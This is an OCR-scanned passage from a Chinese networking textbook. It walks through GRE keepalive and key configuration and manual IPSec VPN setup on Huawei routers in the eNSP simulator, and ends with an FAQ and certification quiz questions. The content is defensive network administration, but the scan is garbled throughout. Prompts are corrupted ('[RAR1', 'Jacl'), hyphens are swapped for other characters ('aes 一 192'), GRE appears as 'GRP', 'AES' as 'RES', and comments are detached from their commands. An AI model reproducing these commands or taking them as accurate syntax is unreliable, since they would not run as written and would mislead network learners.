Serial 1/0/0 命令 ,选择 链 路 类 型 为 PPP, 单 击 “ 确 定 ” 按 钮 。 子 公司 主机 Clientl 再 次 
Ping 总 公司 主机 Client2 ,然后 停止 Wireshark 的 抓 包 ,并 查看 捕获 的 数据 包 信 息 , 可 以 查 
询 到 IP 地 址 的 封装 情况 。 

(14) 在 路 由 器 ARl1 上 配置 GRE 协议 的 Keepalive 检测 。 双 击 路 由 器 AR1, 在 命令 
行 中 完成 以 下 配置 。 

[AR1 ]int tunnel 0/0/0 

[AR1 - Tunnel0/0/0]display interface tunnel 0/0/0 // 查 看 到 “keepalive disabled”， 

// 即 keepalive 检测 默认 是 关闭 的 

[AR1 - Tunnel0/0/0]keepalive // 开 启 tunnel 端口 的 Keepalive 检测 功能 

[AR1 - Tunnel0/0/0]quit 

(15) 在 路 由 器 AR3 上 配置 GRP 协议 的 Keepalive 检测 : 双击 路 由 器 AR3 ,在 命令 
行 中 完成 以 下 配置 。 

[AR3]int tunnel 0/0/0 

[AR3 - Tunnel0/0/0]keepalive // 开 启 Tunnel 端口 的 Keepalive 检测 功能 























[RAR3 - Tunnel0/0/0]quit 


(16) 在 路 由 器 AR1 的 Tunnel 0/0/0 端口 输入 display interface tunnel 0/0/0 命令 
可 以 查看 到 “Keepalive enable period 5 retry-time ”, 表 示 每 5 秒 钟 发 送 一 次 探测 信号 到 
对 方 , 若 3 次 都 没有 回应 ,表示 该 Tunnel 端口 出 现 故障 。 

(17) 在 路 由 器 AR1 上 配置 GRP 关键 字 验 证 。 双 击 路 由 器 AR1, 在 命令 行 中 完成 以 
下 配置 。 

[AR1]int tunnel 0/0/0 

[RAR1 - Tunnel0/0/0]undo keepalive // 关 闭 Keepalive 检测 功能 

[RAR1 - Tunnel0/0/0]gre key 123456 

(18) 在 路 由 器 AR3 上 配置 GRP 关键 字 验 证 。 双 击 路 由 器 AR3 ,在 命令 行 中 完成 以 
下 配置 。 

[AR3]int tunnel 0/0/0 

[AR3 - Tunnel0/0/0]undo keepalive // 关 闭 Keepalive 检测 功能 

[AR3 - Tunnel0/0/0]gre key 123456 

(19) 在 子 公司 的 路 由 器 AR1 上 重新 抓 取 数据 包 。 右 击 路 由 器 AR1, 选 择 “ 数 据 抓 
包 ” 一 Serial 1/0/0 命令 ,选择 链 路 类 型 为 PPP , 单 击 “确定 ”按钮 。 子 公司 主机 Clientl 再 
次 Ping 总 公司 主机 Client2 ,然后 停止 Wireshark 的 抓 包 , 并 查看 捕获 的 数据 包 信息 ,在 
GRE 封装 协议 中 可 以 查询 到 Key 值 信息 ,如 图 20-5 所 示 。 





ENE Routing Er at 





Flags d versTon: Ox2000 ~ 
Protocol Type: IP (0x0800) 
GRE Key: 0x0001e240 


图 20-5 Key 值 信息 


2043 任务 3: 利用 eNSP 模 拟 实 现 IPSec VPRN 的 配置 
1. 任务 目标 


在 eNSP 模拟 软件 上 实现 IPSec VPN 的 配置 ,具体 包括 以 下 内 容 。 
(1) 配置 网 络 可 达 。 

(2) 配置 访问 控制 列表 识别 兴趣 流 。 

(3) 配置 IPSec 安全 提议 。 

(4) 定义 保护 数据 流 所 使 用 的 封装 模式 、 验 证 方法 和 加 密 算法 。 
(5) 创建 IPSec 的 安全 策略 。 

(6) 将 IPSec 的 安全 策略 指派 到 相应 端口 。 


2. 案例 导入 


为 保护 企业 网 络 安全 ,需要 利用 IPSec VPN 技术 实现 顺德 子 公 司 与 广州 总 公司 的 
互联 。 
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3. 工作 环境 


(1) Windows 7 系统 的 主机 。 
(2) 主机 中 预 装 eNSP 软件 。 


4. 实施 过 程 

对 于 这 一 任务 ,网 络 拓扑 图 如 图 20-4 所 示 , 需 要 2 台 PC、2 台 S3700 交换 机 、3 台 
AR2220 路 由 器 。 

(1) 按照 网 络 拓扑 图 连接 各 个 设备 ,交换 机 不 需要 配置 ,正确 连 线 即 可 。 


(2) 按照 设备 IP 地 址 信息 表 ( 见 表 20-3) 配 置 顺 德 子 公司 计算 机 Clientl 和 广州 总 公 
司 计算 机 Client2 的 IP 地 址 、 子 网 掩 码 和 网 关 。 


(3) 路 由 器 AR1 的 基本 配置 如 下 。 


< Huawei > System — view 
[Huawei]sysname RAR1 
[AR1] interface gigabitethernet 0/0/0 


[AR1 - GigabitEthernet0/0/0]ip address 10.1.1.1 24 


[RAR1 - GigabitEthernet0/0/0]quit 

[AR1 ]interface serial 1/0/0 

[RAR1 - seriall/0/0]ip address 200. 200. 200.1 24 
[AR1 - seriall/0/0]quit 


[AR1]ip route— static 0.0.0.0 0.0.0.0 200.200.200.2 


(4) 路 由 器 AR3 的 基本 配置 如 下 。 


< Huawei > system — view 
[Huawei]sysname AR3 
[AR3] interface gigabitethernet 0/0/0 


[AR3 - GigabitEthernet0/0/0]ip address 10.2.2.1 24 


[AR3 - GigabitEthernet0/0/0]quit 
[AR3]interface serial 1/0/0 

[AR3 - seriall/0/0]ip address 201.201.201.2 24 
[aAR3 - seriall/0/0]quit 


[AR3]ip route— static 0.0.0.0 0.0.0.0 201.201.201.1 


(5) 路 由 器 AR2 的 基本 配置 如 下 。 


< Huawei > system — view 

[Huawei]sysname AR2 

[AR2]interface serial 1/0/0 

[AR2 - seriall/0/0]ip address 200. 200.200.2 24 
[AR2 — serial1l/0/0]quit 

[AR2]interface serial 1/0/1 

[AR2 - seriall/0/1]ip address 201.201.201.1 24 
[RAR2 - serial1l/0/1]quit 

[AR2]rip 

[AR2— rip— 1]version 2 


// 进 入 系统 视图 界面 

// 修 改 设备 名 称 为 RR1 
// 进 入 端口 

// 配 置 IP 地 址 与 子 网 掩 码 
// 退 出 端口 

// 进 入 端口 S 1/0/0 

// 配 置 IP 地 址 与 子 网 掩 码 
// 退 出 端口 

// 配 置 默认 路 由 


// 进 入 系统 视图 界面 

// 修 改 设备 名 称 为 AR3 
// 进 入 端口 

// 配 置 IP 地 址 与 子 网 掩 码 
// 退 出 端口 

// 进 入 端口 S 1/0/0 

// 配 置 IP 地 址 与 子 网 掩 码 
// 退 出 端口 

// 配 置 默 认 路 由 


// 进 入 系统 视图 界面 

// 修 改 设备 名 称 为 AR2 
// 进 入 端口 S 1/0/0 

// 配 置 IP 地 址 与 子 网 掩 码 
// 退 出 端口 

// 进 入 端口 S 1/0/1 

// 配 置 IP 地 址 与 子 网 掩 码 
// 退 出 端口 

// 开 启 rip 进程 

// 运 行 v2 版 本 








号 
T 




















[AR2— rip— 1]undo summary 

[AR2— rip— 1]network 200.200.200.0 // 宣 告 直 连 网 络 

[AR2— rip— 1]network 201.201.201.0 // 宣 告 直 连 网 络 

[AR2— rip—1]quit 

(6) 测试 网 络 连通 性 。 总 公司 和 子 公 司 的 两 台 路 由 器 AR1 和 AR3 的 外 网 端口 可 以 
互相 Ping 通 。 

(7) 路 由 器 AR1 的 IPSec VPN 配置 如 下 。 


<RR1 > system— view 


[AR1]Jacl 3001 // 创 建 访问 控制 列表 

[AR1 ~- acl ~ adv ~ 3001]rule 5 permit ip source 10.1.1.0 0.0.0.255 destination 10.2.2.0 0.0. 
0.255 // 配 置 规则 

[AR1 ~- acl ~- adv— 3001]quit 

[AR1 ]ipsec proposal IPSEC // 把 IPSec Proposal 取 名 为 IPSEC 


[AR1 - ipsec - proposal - IPSEC]esp authentication 一 algorithm sha2 - 256 
// 采 用 ESP 封装 ,身份 验证 的 方法 是 SHA2 - 256 
[RAR1 - ipsec - proposal - IPSEC]esp encryption -algorithm aes 一 192 
// 采 用 ESP 封装 ,加 密 算法 采用 AES - 192 
[RAR1 - ipsec - proposal - IPSEC]quit 
[AR1 ]ipsec policy IPSEC 10 manual 
// 把 IPSec Policy 取 名 为 IPSEC, 编号 为 10, 采 用 手工 方式 配置 
[AR1 - ipsec - policy- manual - IPSEC- 10]security acl 3001 ”// 指 定 哪些 数据 包 需 要 保护 
[RR1 - ipsec - policy - manual - IPSEC - 10]proposal IPSEC // 调 用 刚刚 配置 好 的 Proposal 
[AR1 - ipsec - policy- manual - IPSEC- 10]tunnel local 200.200.200.1 // 定 义 隧道 的 源 端 
[AR1 - ipsec -policy manual - IPSEC 一 10]tunnel remote 201.201.201.2 // 定 义 隧道 的 目的 端 
[RAR1 - ipsec - policy ~ manual - IPSEC— 10]sa spi outbound esp 123456 
// 配 置 发 送 方向 的 索引 号 是 123456 
[RAR1 - ipsec ~ policy— manual — IPSEC— 10]sa spi inbound esp 654321 
// 配 置 接收 方向 的 索引 号 是 654321 
[AR1 - ipsec ~ policy ~ manual — IPSEC - 10]sa string - key outbound esp cipher aaaaaa 
// 配 置 发 送 方 向 的 加 密 密 码 是 aaaaaa, 并 采用 加 密 存放 
[AR1 - ipsec — policy ~ manual - IPSEC— 10]sa string - key inbound esp cipher bbbbbb 
// 配 置 接收 方向 的 加 密 密 码 是 bbbbbb, 并 采用 加 密 存 放 
[RAR1 - ipsec - policy ~ manual - IPSEC - 10]int serial 1/0/0 
[AR1 - Seriall/0/0]ipsec policy IPSEC // 把 配置 好 的 策略 应 用 在 AR1 的 外 网 端口 上 
[AR1 - Seriall/0/0]display current - configuration  ”// 查 看 配置 
[AR1 - Seriall/0/0]quit 


(8) 路 由 器 AR3 的 IPSec VPN 配置 如 下 。 


< AR3 > system - view 


[RAR3]acl 3001 // 创 建 访问 控制 列表 

[AR3 - acl- adv-3001]rule 5 permit ip source 10.2.2.0 0.0.0.255 destination 10.1.1.0 0.0. 
0.255 // 配 置 规则 

[AR3 -acl ~ adv— 3001]quit 

[AR3]ipsec proposal IPSEC // 把 IPSec proposal 取 名 为 IPSEC 


[AR3 - ipsec — proposal — IPSEC]esp authentication 一 algorithm sha2 — 256 
// 采 用 ESP 封装 ,身份 验证 的 方法 是 SHA2 - 256 
[AR3 - ipsec — proposal — IPSEC]esp encryption — algorithm aes — 192 
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// 采 用 ESP 封装 ,加 密 算法 采用 RES- 192 
[AR3 - ipsec — proposal — IPSEC]quit 
[RAR3 ] ipsec policy IPSEC 10 manual 
// 把 IPSec Policy 取 名 为 IPSEC, 编号 为 10, 采 用 手工 方式 配置 安全 联盟 
[AR3 - ipsec 一 policy 一 manual 一 IPSEC- 10]security acl 3001 // 指 定 哪些 数据 包 需 要 保护 
[AR3 - ipsec - policy- manual - IPSEC - 10]proposal IPSEC // 调 用 刚刚 配置 好 的 Proposal 
[AR3 - ipsec -policy 一 manual - IPSEC-- 10]tunnel local 201.201.201.2 // 定 义 隧道 的 源 端 
[AR3 - ipsec - policy- manual - IPSEC - 10]tunnel remote 200.200.200.1 // 定 义 隧道 的 目的 端 
[AR3 - ipsec — policy ~ manual - IPSEC— 10]sa spi outbound esp 654321 
// 配 置 发 送 方向 的 索引 号 是 654321 
[AR3 - ipsec — policy ~ manual — IPSEC— 10]sa spi inbound esp 123456 
// 配 置 接收 方向 的 索引 号 是 123456 
[AR3 - ipsec- policy ~ manual - IPSEC- 10]sa string - key outbound esp cipher bbbbbb 
// 配 置 发 送 方向 的 加 密 密 码 是 bbbbbb, 并 采用 加 密 存 放 
[RAR3 - ipsec - policy ~ manual ~ IPSEC — 10]sa string - key inbound esp cipher aaaaaa 
// 配 置 接收 方向 的 加 密 密 码 是 aaaaaa, 并 采用 加 密 存放 
[RAR3 - ipsec — policy- manual - IPSEC — 10]int serial 1/0/0 
[AR3 - Seriall/0/0]ipsec policy IPSEC // 把 配置 好 的 策略 应 用 在 AR1 的 外 网 端口 上 
[AR3 - Seriall/0/0]display current - configuration // 查 看 配置 
[AR3 - Seriall/0/0]quit 


(9) 配置 完成 后 ,从 子 公司 的 Client1(10. 1. 1. 100) 可 以 Ping 通 总 公司 Client2 的 IP 
地 址 (10. 2. 2. 100) 。 

(10) 在 子 公 司 的 路 由 器 AR1 上 抓 取 数据 包 。 右 击 路 由 器 AR1, 选 择 “ 数 据 抓 包 ”一 
Serial 1/0/0 命令 ,选择 链 路 类 型 为 PPP, 单 击 “ 确 定 ” 按 钮 。 子 公司 主机 Clientl 再 次 
Ping 总 公司 主机 Client2 ,然后 停止 Wireshark 的 抓 包 , 并 查看 捕获 的 数据 包 信 息 ,发 现 无 
法 查看 到 数据 包 内 的 具体 信息 ,证明 IPSec 的 封装 具有 安全 性 。 

(11) 在 路 由 器 AR1 查看 IPSec 封装 情况 。 

[aAR1]display ipsec proposal // 查 看 IPSec 的 验证 算法 和 加 密 算 法 

[aR1]display ipsec policy // 查 看 IPSec Inbound 方向 和 Outbound 方向 的 策略 

[AR1]display ipsec sa // 查 看 IPSec 的 会 话 ,确认 隧道 本 地 和 对 端的 IP 地 址 ,以 及 索引 号 SPI 

[AR1 ]display ipsec statistics esp 


// 查 看 IPSec 的 统计 数 , 如 进来 和 出 去 的 数据 包 个 数 , 当 从 主机 Client1 再 Ping 一 次 Client2 后 ， 
// 数 据 包 个 数 会 发 生 明显 变化 


20.5 常见 问题 解答 


IPSec VPN 和 GRE VPN 的 区 别 是 什么 ? 

答 : IPSec VPN 用 于 在 两 个 端点 之 间 提 供 安 全 的 IP 通信 ,但 只 能 加 密 并 传播 单 播 数 
据 , 无 法 加 密 和 传输 语音 、 视 频 、 动 态 路 由 协议 信息 等 组 播 数据 流量 。 而 GRE (Generic 
Routing Encapsulation ,通用 路 由 封装 协议 ) VPN 提供 了 将 一 种 协议 的 报 文 封装 在 另 一 
种 协议 报 文 中 的 机 制 , 是 一 种 隧道 封装 技术 。GRE 可 以 封装 组 播 数 据 , 并 可 以 和 IPSec 
VPN 结合 使 用 ,从 而 保证 语音 、 视 频 等 组 播 业务 的 安全 。 


























20.6 认证 试题 
、 选 择 是 


以 下 关于 VPN 说 法 正确 的 是 ( 入 

A. VPN 指 的 是 用 户 自 己 租用 的 ,与 公共 网 络 物理 上 完全 隔离 的 、 安 全 的 线路 
B. VPN 指 的 是 用 户 通过 公共 网 络 建立 的 ,临时 的 、 安 全 的 连接 

C. VPN 不 能 做 到 信息 验证 和 身份 验证 

D. VPN 只 能 提供 身份 验证 ,不 能 提供 加 密 数 据 的 功能 


. 关于 虚拟 专用 网 ,下 说 法 正确 的 是 ( js 


A. 安全 套 接 层 协 议 (SSL) 是 在 应 用 层 和 传输 层 之 间 增 加 的 安全 机 制 可 以 用 SSL 
在 任何 网 络 上 建立 虚拟 专用 网 

B. 安全 套 接 层 协议 (SSL) 的 缺点 是 进行 服务 器 端 对 客服 端的 单 向 身份 验证 

C. 安全 IP 协议 (IPSec) 通 过 认证 头 (AH) 提 供 无 连接 的 数据 完整 性 和 数据 源 验 
证 ,数据 加 密 性 保护 和 抗 重 发 攻击 服务 

D. 当 IPSec 处 于 传输 模式 时 , 报 文 不 仅 在 主机 到 网 关 之 间 的 通路 上 进行 加 密 ,而 
且 在 发 送 方 和 接收 方 之 间 的 所 有 通路 上 都 要 加 密 


. IPSec VPN 安全 技术 没有 用 到 ( Ys 
A. 隧道 技术 B. 加 密 技术 
C. 入 侵 检测 技术 D. 身份 验证 技术 
.IPSec VPN 是 ( )VPN 协议 标准 。 
A. 第 一 层 B. 第 二 层 C. 第 三 层 D. 第 四 层 
. IPSec 在 通信 开始 之 前 , 先 在 两 个 VPN 节点 或 网 关 之 间 建立 ( je 
A. IP 地 址 B. 安全 联盟 C. 协议 类 型 D. 连接 
. 实现 VPN 的 关键 技术 主要 有 隧道 技术 、 加 解密 技术 、( ) 和 身份 验证 技术 。 
A. 入 侵 检测 技术 B. 病毒 防治 技术 
C. 安全 审计 技术 D. 密 钥 管理 技术 


.如 果 需 要 在 传输 层 实现 VPN ,可 选 的 协议 是 ( )。 


A. I2TP B, PPTP Cc. TLS D. IPSec 


. AH 协议 不 具有 ( ) 功 能 。 


A. 数据 加 密 B. 完整 性 保护 C. 防 重 放 D. 数据 源 验证 


. ESP 协议 具有 ( ) 功 能 。 


A. 数据 加 密 B. 完整 性 保护 C. 防 重 放 D. 数据 源 验证 


10. IKE 工作 过 程 分 为 ( ) 个 阶段 。 


A. 1 B.2 C. 3 D. 4 
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二 、 填 空 题 

1. IPSec 的 密 钥 管理 包括 密 钥 的 确定 和 分 发 ,IPSec 支持 和 两 种 密 
钥 管理 方式 。 

2. IPSec 是 IETF 以 RFC 形式 公布 的 一 组 安全 协议 集 , 它 包 括 AH 与 ESP 两 个 安全 
机 制 ,其 中 不 支持 保密 服务 。 

三 、 简 答题 


1. 常见 的 VPN 隧道 协议 有 哪些 ? 
2. VPN 技术 的 优势 有 哪些 ? 


四 、 操 作 题 


实现 基于 Windows 的 VPN 通信 。 


[10 
[11 
[12 
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